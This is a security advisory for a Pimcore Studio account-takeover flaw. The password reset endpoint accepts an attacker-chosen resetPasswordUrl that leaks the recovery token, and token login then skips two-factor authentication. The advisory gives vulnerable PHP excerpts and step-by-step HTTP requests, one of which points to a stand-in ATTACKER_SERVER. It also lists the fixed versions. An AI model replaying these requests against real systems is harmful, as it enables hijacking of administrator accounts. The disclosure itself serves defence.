CVE-2026-55207
Pimcore: Account Takeover via Password Reset URL Injection allows unauthenticated attacker to hijack any admin account with 2FA bypass
Summary
## Summary An unauthenticated attacker takes over any Pimcore admin account by sending a password reset request with an attacker-controlled `resetPasswordUrl`. The server generates a real cryptographic recovery token, appends it to the attacker's URL, and emails the link to the victim. When the victim clicks the link in their email, the token is sent to the attacker's server. The attacker then uses `POST /pimcore-studio/api/login/token` to authenticate as the victim with full admin privileges. Token login explicitly disables two-factor authentication, so even accounts with TOTP/Google Authenticator are compromised. ## Vulnerability Details ### Unauthenticated Endpoint Accepts Attacker URL The reset password endpoint at `src/User/Controller/ResetPasswordController.php` line 53 is public (uses `PUBLIC_STUDIO_API` voter). The `ResetPassword` schema at `src/User/Schema/ResetPassword.php` accepts a `resetPasswordUrl` string as a required parameter with zero validation. No URL scheme check, no domain allowlist, no comparison against the configured system domain. ```php final readonly class ResetPassword { public function __construct( private string $username, private string $resetPasswordUrl // attacker-controlled, no validation ) {} } ``` ### Token Appended to Attacker URL In `src/User/Service/UserLoginService.php` at line 64-65, the service generates a real recovery token and concatenates the attacker's URL with the token: ```php $token = $this->authenticationResolver->generateTokenByUser($user); $loginUrl = $resetPassword->getResetPasswordUrl() . '?token=' . $token; ``` The token is generated and stored in the database BEFORE `sendResetPasswordMail()` is called on line 68. Even if email delivery fails, the token exists. ### Token Login Bypasses 2FA `src/Security/Authenticator/AdminTokenAuthenticator.php` line 60 explicitly disables 2FA on token login: ```php $pimcoreUser->setTwoFactorAuthentication('required', false); ``` ### Token Validity The token is encrypted with the application secret, valid for 24 hours, and single-use (nullified after authentication). The attacker's server captures it before the victim completes any reset flow. ## Steps to Reproduce Tested on Pimcore 12.x (2026.x branch, latest commit `82f9ff6`), Docker, PHP 8.4. ### 1. Send password reset with attacker URL (no authentication needed) ```http POST /pimcore-studio/api/user/reset-password HTTP/1.1 Host: TARGET Content-Type: application/json {"username":"admin","resetPasswordUrl":"https://ATTACKER_SERVER:9999/steal"} ``` - Response: 500 (email delivery failed in test env, but token def5020020bd133... visible in error trace, confirmed generated in DB ### 2. Confirm token was generated Database query shows the recovery token was created: ``` name has_token token_prefix admin 1 def50200cdbd3c1292288a716c623f ``` ### 3. Token login (after victim clicks the link in their email) ```http POST /pimcore-studio/api/login/token HTTP/1.1 Host: TARGET Content-Type: application/json {"token":"def50200cdbd3c1292288a716c623f...full_token..."} ``` **Response:** ``` HTTP/1.1 200 OK Set-Cookie: PHPSESSID=48d784c5bfcc09c8b897f2ab34038419; path=/; httponly; samesite=strict Set-Cookie: pimcore_studio_auth_profile_token=d7a9ad; path=/; httponly; samesite=lax ``` ### 4. Verify full admin access with the stolen session ```http GET /pimcore-studio/api/users HTTP/1.1 Host: TARGET Cookie: PHPSESSID=48d784c5bfcc09c8b897f2ab34038419 ``` **Response:** `HTTP/1.1 200 OK` ```json {"totalItems":1,"items":[{"id":1,"username":"admin","additionalAttributes":[]}]} ``` <img width="1668" height="906" alt="image" src="https://github.com/user-attachments/assets/8f2b63
Affected packages
| Ecosystem | Package | Affected versions | Fixed versions |
|---|---|---|---|
| Packagist | pimcore/studio-backend-bundle | — | 2025.4.6, 2026.1.6 |
Remediation: Upgrade to 2025.4.6 or later.
References
Includes data from the GitHub Advisory Database, licensed under CC-BY 4.0.
CVE® is a registered trademark of The MITRE Corporation. CVE content reproduced under the CVE Terms of Use; copyright designation © MITRE.
EPSS scores provided by the FIRST.org Exploit Prediction Scoring System.